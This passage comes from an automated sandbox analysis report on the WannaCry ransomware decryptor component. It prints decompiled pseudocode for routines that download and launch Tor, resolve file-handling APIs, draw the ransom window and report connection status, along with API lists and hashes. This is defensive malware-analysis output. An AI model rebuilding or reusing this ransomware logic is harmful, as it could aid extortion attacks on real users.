                                  						_push(0);
                                  						_t55 = E0040B780( &_v1040, "TaskData", 0x422148);
                                  						_t86 = _t86 + 0xc;
                                  						if(_t55 != 0) {
                                  							goto L5;
                                  						} else {
                                  							_push(0);
                                  							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
                                  							_t86 = _t86 + 0xc;
                                  							if(_t56 != 0) {
                                  								goto L5;
                                  							} else {
                                  								return _t56;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • sprintf.MSVCRT ref: 0040B87A
                                  • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
                                  • CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  • sprintf.MSVCRT ref: 0040B924
                                  • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                    • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000428), ref: 0040B793
                                    • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                    • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                    • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                  • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                  • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                    • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                  • String ID: %s\%s\%s$D$TaskData$Tor$taskhsvc.exe$tor.exe
                                  • API String ID: 4284242699-636499233
                                  • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                  • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                  • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402C40() {
                                  				_Unknown_base(*)()* _t11;
                                  				struct HINSTANCE__* _t23;
                                  
                                  				if(E00404B70() == 0) {
                                  					L12:
                                  					return 0;
                                  				} else {
                                  					if( *0x4217a0 == 0) {
                                  						_t23 = LoadLibraryA("kernel32.dll");
                                  						if(_t23 == 0) {
                                  							goto L12;
                                  						} else {
                                  							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
                                  							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
                                  							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
                                  							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
                                  							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
                                  							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
                                  							_t11 = GetProcAddress(_t23, "CloseHandle");
                                  							 *0x4217b8 = _t11;
                                  							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
                                  								goto L12;
                                  							} else {
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                  • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                  • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                  • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                  • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                  • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                  • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                  • API String ID: 2238633743-1294736154
                                  • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                  • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00405580(void* __ecx) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v28;
                                  				char _v80;
                                  				void* _v96;
                                  				struct tagRECT _v112;
                                  				signed int _v116;
                                  				void* _v120;
                                  				struct HDC__* _v140;
                                  				long _v144;
                                  				struct tagRECT _v160;
                                  				char _v164;
                                  				void* _v172;
                                  				intOrPtr _v176;
                                  				char _v188;
                                  				int _v192;
                                  				int _v196;
                                  				int _v204;
                                  				intOrPtr _v212;
                                  				void* _v216;
                                  				struct HBRUSH__* _v220;
                                  				char _v224;
                                  				intOrPtr _v228;
                                  				void* _v244;
                                  				intOrPtr _v248;
                                  				intOrPtr _v252;
                                  				signed int _v256;
                                  				void* _v260;
                                  				void* _v264;
                                  				void* _v268;
                                  				int _v272;
                                  				intOrPtr _v296;
                                  				intOrPtr _v300;
                                  				intOrPtr _v304;
                                  				int _t78;
                                  				long _t79;
                                  				struct HBRUSH__* _t80;
                                  				struct HDC__* _t84;
                                  				char _t85;
                                  				struct HBRUSH__* _t86;
                                  				intOrPtr _t89;
                                  				intOrPtr _t90;
                                  				intOrPtr _t102;
                                  				intOrPtr _t104;
                                  				intOrPtr _t108;
                                  				intOrPtr _t136;
                                  				void* _t151;
                                  				struct HBRUSH__* _t152;
                                  				void* _t153;
                                  				void* _t156;
                                  				int _t160;
                                  				intOrPtr _t162;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413943);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t162;
                                  				_t156 = __ecx;
                                  				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
                                  				_t160 = 0;
                                  				_v204 = 0;
                                  				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
                                  				_v176 = _t108;
                                  				if(_t108 != 0) {
                                  					L00412DD0();
                                  					_t79 =  *(_t156 + 0x50);
                                  					_v8 = 0;
                                  					_v164 = 0xffb53f;
                                  					_v160.left = _t79;
                                  					_v160.top = 0x674017;
                                  					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
                                  					_v160.bottom = 0;
                                  					_v144 =  *(_t156 + 0x54);
                                  					L00412E5A();
                                  					_t80 =  *((intOrPtr*)(_t79 + 8));
                                  					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
                                  					_t152 = _t80;
                                  					_v220 = _t152;
                                  					L00412E54();
                                  					asm("sbb eax, eax");
                                  					_v28 = 1;
                                  					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
                                  					_push(_t84);
                                  					L00412E4E();
                                  					_push(_t152);
                                  					L00412DE2();
                                  					if(_t84 != 0) {
                                  						_t84 =  *(_t84 + 4);
                                  					}
                                  					_push(_t84);
                                  					_t85 = _v224;
                                  					_push(_t85);
                                  					L00412E48();
                                  					_v212 = _t85;
                                  					_t153 = 0;
                                  					_v252 = 1;
                                  					_t86 = CreateSolidBrush( *(_t156 + 0x54));
                                  					_v220 = _t86;
                                  					FillRect(_v140,  &_v160, _t86);
                                  					_t89 = 0;
                                  					_v260 = 0;
                                  					if(_t108 > 0) {
                                  						do {
                                  							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
                                  							E00405110(_t156,  &_v188, _v224);
                                  							asm("sbb eax, eax");
                                  							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
                                  							_t102 =  *((intOrPtr*)(_t156 + 0x74));
                                  							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
                                  							_t153 = _t153 + 1;
                                  							if(_t153 != _t102) {
                                  								goto L10;
                                  							} else {
                                  								_t136 =  *((intOrPtr*)(_t156 + 0x70));
                                  								if(_t136 != 1) {
                                  									if(_t153 != _t102) {
                                  										goto L10;
                                  									} else {
                                  										_t104 = _t136;
                                  										if(_t104 <= 1) {
                                  											goto L10;
                                  										} else {
                                  											if(_v304 != _t104) {
                                  												_t153 = 0;
                                  												_t160 = 0;
                                  												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
                                  												_v304 = _v304 + 1;
                                  												goto L10;
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L11;
                                  							L10:
                                  							_t89 = _v296 + 1;
                                  							_v296 = _t89;
                                  						} while (_t89 < _v272);
                                  					}
                                  					L11:
                                  					_t90 = _v228;
                                  					if(_t90 != 0) {
                                  						_t90 =  *((intOrPtr*)(_t90 + 4));
                                  					}
                                  					_push(_t90);
                                  					_push(_v248);
                                  					L00412E48();
                                  					L00412E42();
                                  					DeleteObject(_v264);
                                  					_t78 = DeleteObject(_v244);
                                  					_v80 = 0;
                                  					L00412E3C();
                                  					_v80 = 0xffffffff;
                                  					L00412DB8();
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t78;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                  • String ID:
                                  • API String ID: 1233696098-0
                                  • Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                  • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                  • Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                  • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
                                  				intOrPtr _v0;
                                  				unsigned int _v4;
                                  				unsigned int _v8;
                                  				unsigned int _v12;
                                  				intOrPtr _v20;
                                  				char _v36;
                                  				intOrPtr _v56;
                                  				char _v60;
                                  				intOrPtr _v64;
                                  				char _v68;
                                  				unsigned int _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				intOrPtr _v84;
                                  				signed int _v88;
                                  				signed int _v92;
                                  				signed int _v96;
                                  				signed long long _v100;
                                  				intOrPtr _v104;
                                  				void* _v108;
                                  				void* _v112;
                                  				void* _v120;
                                  				unsigned int _t93;
                                  				signed int _t96;
                                  				signed int _t100;
                                  				unsigned int _t102;
                                  				signed int _t107;
                                  				int _t112;
                                  				char _t113;
                                  				signed char _t115;
                                  				RECT* _t122;
                                  				signed int _t125;
                                  				signed int _t134;
                                  				intOrPtr* _t135;
                                  				unsigned int _t138;
                                  				signed int _t140;
                                  				signed int _t143;
                                  				intOrPtr* _t146;
                                  				char _t151;
                                  				char _t152;
                                  				signed int _t169;
                                  				intOrPtr* _t177;
                                  				signed int _t192;
                                  				intOrPtr* _t193;
                                  				intOrPtr _t195;
                                  				unsigned int _t202;
                                  				char _t209;
                                  				intOrPtr _t210;
                                  				signed long long _t228;
                                  				signed long long _t229;
                                  				signed long long _t230;
                                  				signed long long _t231;
                                  				signed long long _t234;
                                  
                                  				_t228 = __fp0;
                                  				_push(0xffffffff);
                                  				_push(E004140A0);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t210;
                                  				_t93 = _a20;
                                  				_v104 = __ecx;
                                  				_t138 = _a16;
                                  				_t169 = _t138 & 0x000000ff;
                                  				_v76 = _t169;
                                  				_t192 = (_t93 & 0x000000ff) - _t169;
                                  				_t140 = _t138 >> 0x00000010 & 0x000000ff;
                                  				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
                                  				_v88 = 0;
                                  				_v96 = _t96;
                                  				_v92 = _t140;
                                  				asm("cdq");
                                  				_t143 = _t96 ^ 0;
                                  				_v100 = 0;
                                  				asm("cdq");
                                  				_a20 = _t192;
                                  				_t134 = 0;
                                  				if(0 <= _t143) {
                                  					_t134 = _t143;
                                  				}
                                  				asm("cdq");
                                  				_t100 = _t192 ^ 0;
                                  				if(_t100 <= _t134) {
                                  					_a16 = 0;
                                  					if(0 <= _t143) {
                                  						_a16 = _t143;
                                  					}
                                  				} else {
                                  					_a16 = _t100;
                                  				}
                                  				_t193 = _a8;
                                  				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                  				if(_t102 < _a16) {
                                  					_a16 = _t102;
                                  				}
                                  				if(_a16 == 0) {
                                  					_a16 = 1;
                                  				}
                                  				asm("fild dword [esp+0x88]");
                                  				asm("fild dword [esp+0x8c]");
                                  				_t135 = _a4;
                                  				_t229 = _t228 / st1;
                                  				_v80 = _t229;
                                  				asm("fild dword [esp+0x1c]");
                                  				_t230 = _t229 / st1;
                                  				_v100 = _t230;
                                  				asm("fild dword [esp+0x20]");
                                  				_t231 = _t230 / st1;
                                  				_v96 = _t231;
                                  				st0 = _t231;
                                  				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
                                  				_v80 = _t107;
                                  				if(_t107 == 0 && _a8 > 1) {
                                  					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
                                  					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
                                  						_v8 = 1;
                                  					}
                                  				}
                                  				_t146 = _t193;
                                  				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                  				_t202 = 0;
                                  				asm("fild dword [esp+0x8c]");
                                  				_v72 = 0;
                                  				_v68 =  *_t146;
                                  				_v76 = 0x415a44;
                                  				asm("fidiv dword [esp+0x88]");
                                  				_v64 =  *((intOrPtr*)(_t146 + 4));
                                  				_v60 =  *((intOrPtr*)(_t146 + 8));
                                  				_v56 =  *((intOrPtr*)(_t146 + 0xc));
                                  				_a12 = _t231;
                                  				_t112 = _a8;
                                  				_v12 = 0;
                                  				_v4 = 0;
                                  				if(_t112 <= 0) {
                                  					L31:
                                  					_v76 = 0x415c00;
                                  					_v12 = 1;
                                  					L00412D52();
                                  					 *[fs:0x0] = _v20;
                                  					return _t112;
                                  				} else {
                                  					while(1) {
                                  						asm("fild dword [esp+0x7c]");
                                  						_t195 =  *_t193;
                                  						L0041304A();
                                  						_t46 = _t202 + 1; // 0x1
                                  						_v4 = _t46;
                                  						_t209 = _t112 + _t195;
                                  						asm("fild dword [esp+0x7c]");
                                  						_v68 = _t209;
                                  						_t234 = st0 * _a12 * _a12;
                                  						L0041304A();
                                  						_t113 = _t112 + _t195;
                                  						_v60 = _t113;
                                  						if(_t202 == _a8 - 1) {
                                  							_t113 =  *((intOrPtr*)(_v0 + 8));
                                  							_v60 = _t113;
                                  						}
                                  						_t177 = _a4;
                                  						_t151 =  *_t177;
                                  						if(_t113 < _t151) {
                                  							goto L29;
                                  						}
                                  						if(_t209 < _t151) {
                                  							_v68 = _t151;
                                  						}
                                  						_t152 =  *((intOrPtr*)(_t177 + 8));
                                  						if(_t113 > _t152) {
                                  							_v60 = _t152;
                                  						}
                                  						L0041304A();
                                  						_v92 = 0;
                                  						L0041304A();
                                  						_t115 = _t113 + _v100 + _v96;
                                  						_v92 = _t115 << 8;
                                  						L0041304A();
                                  						_push(_t115 + _v84 & 0x000000ff | _v92);
                                  						if(_v80 == 0) {
                                  							_t112 = E00409D40( &_v36, _t135,  &_v68);
                                  							_push(_t112);
                                  							L00412FF2();
                                  						} else {
                                  							_push(CreateSolidBrush());
                                  							L00412D5E();
                                  							_t122 = E00409D40( &_v60, _t135,  &_v76);
                                  							_t76 =  &_v96; // 0x415a44
                                  							asm("sbb ecx, ecx");
                                  							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
                                  							L00412D52();
                                  						}
                                  						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
                                  							L30:
                                  							_t202 = _v4;
                                  							_t112 = _a8;
                                  							_v4 = _t202;
                                  							if(_t202 < _t112) {
                                  								_t193 = _v0;
                                  								continue;
                                  							}
                                  						}
                                  						goto L31;
                                  						L29:
                                  						st0 = _t234;
                                  						goto L30;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                  • String ID: DZA
                                  • API String ID: 2487345631-3378329814
                                  • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                  • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                  				void* _t19;
                                  				long _t21;
                                  				long _t24;
                                  				void* _t25;
                                  				void* _t26;
                                  				intOrPtr _t27;
                                  				long _t48;
                                  				void* _t49;
                                  				intOrPtr _t50;
                                  
                                  				_t27 = _a4;
                                  				_t48 = _a8;
                                  				_t19 = _t27 - 0x4e20;
                                  				_t49 = __ecx;
                                  				if(_t19 == 0) {
                                  					if(_t48 != 0) {
                                  						if(_t48 == 0xffffffff) {
                                  							goto L14;
                                  						}
                                  						goto L15;
                                  					} else {
                                  						_push(__ecx);
                                  						_a4 = _t50;
                                  						L00412CAA();
                                  						E00401970("Connected");
                                  						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
                                  						_push(_a4);
                                  						_push(_t48);
                                  						_push(_t27);
                                  						 *(_t49 + 0xb0) = 0x23;
                                  						L00412BAE();
                                  						return _t21;
                                  					}
                                  				} else {
                                  					_t19 = _t19 - 1;
                                  					if(_t19 == 0) {
                                  						if(_t48 != 0) {
                                  							goto L9;
                                  						} else {
                                  							_push(__ecx);
                                  							_a4 = _t50;
                                  							L00412CAA();
                                  							E00401970("Sent request");
                                  							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
                                  							_push(_a4);
                                  							_push(_t48);
                                  							_push(_t27);
                                  							 *(_t49 + 0xb0) = 0x28;
                                  							L00412BAE();
                                  							return _t24;
                                  						}
                                  					} else {
                                  						_t19 = _t19 - 1;
                                  						if(_t19 != 0) {
                                  							L15:
                                  							_push(_a12);
                                  							_push(_t48);
                                  							_push(_t27);
                                  							L00412BAE();
                                  							return _t19;
                                  						} else {
                                  							if(_t48 != 0) {
                                  								if(_t48 != 1) {
                                  									L9:
                                  									if(_t48 == 0xffffffff) {
                                  										L14:
                                  										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
                                  									}
                                  									goto L15;
                                  								} else {
                                  									_push(__ecx);
                                  									_a4 = _t50;
                                  									L00412CAA();
                                  									_t25 = E00401970("Succeed");
                                  									_push(_a4);
                                  									_push(_t48);
                                  									_push(_t27);
                                  									L00412BAE();
                                  									return _t25;
                                  								}
                                  							} else {
                                  								_push(__ecx);
                                  								_a4 = _t50;
                                  								L00412CAA();
                                  								_t26 = E00401970("Received response");
                                  								_push(_a4);
                                  								_push(_t48);
                                  								_push(_t27);
                                  								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
                                  								L00412BAE();
                                  								return _t26;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • #2385.MFC42 ref: 00401653
                                  • #537.MFC42(Received response), ref: 00401634
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • #537.MFC42(Succeed), ref: 0040166F
                                  • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                  • #537.MFC42(Sent request), ref: 0040169F
                                  • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                  • #2385.MFC42 ref: 004016D3
                                  • #537.MFC42(Connected), ref: 004016F5
                                  • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                  • #2385.MFC42 ref: 00401729
                                  • #2385.MFC42(?,?,?), ref: 0040174C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2385$#537$MessageSend$#3092#6199#800
                                  • String ID: Connected$Received response$Sent request$Succeed
                                  • API String ID: 3790904636-3692714192
                                  • Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                  • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                  • Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                  • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00404DD0(void* __ecx) {
                                  				intOrPtr _t12;
                                  				long _t13;
                                  				struct HFONT__* _t15;
                                  				long _t16;
                                  				long _t17;
                                  				int _t29;
                                  				int _t32;
                                  				int _t35;
                                  
                                  				L00412CB0();
                                  				_t12 =  *0x42189c; // 0x0
                                  				_t13 =  *(_t12 + 0x824);
                                  				 *(__ecx + 0x6c) = _t13;
                                  				_push(CreateSolidBrush(_t13));
                                  				L00412D5E();
                                  				_t35 = __ecx + 0x70;
                                  				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                  				_push(_t15);
                                  				L00412D5E();
                                  				_push(0x403);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					_t29 =  *(_t35 + 4);
                                  				} else {
                                  					_t29 = 0;
                                  				}
                                  				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
                                  				_push(1);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					_t32 =  *(_t35 + 4);
                                  				} else {
                                  					_t32 = 0;
                                  				}
                                  				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
                                  				_push(2);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
                                  					return 1;
                                  				} else {
                                  					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • #4710.MFC42 ref: 00404DD5
                                  • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                  • #1641.MFC42(00000000), ref: 00404DF3
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                  • #1641.MFC42(00000000), ref: 00404E26
                                  • #3092.MFC42(00000403,00000000), ref: 00404E32
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                  • #3092.MFC42(00000001), ref: 00404E57
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                  • #3092.MFC42(00000002), ref: 00404E76
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                  Strings
                                  Memory Dump Source
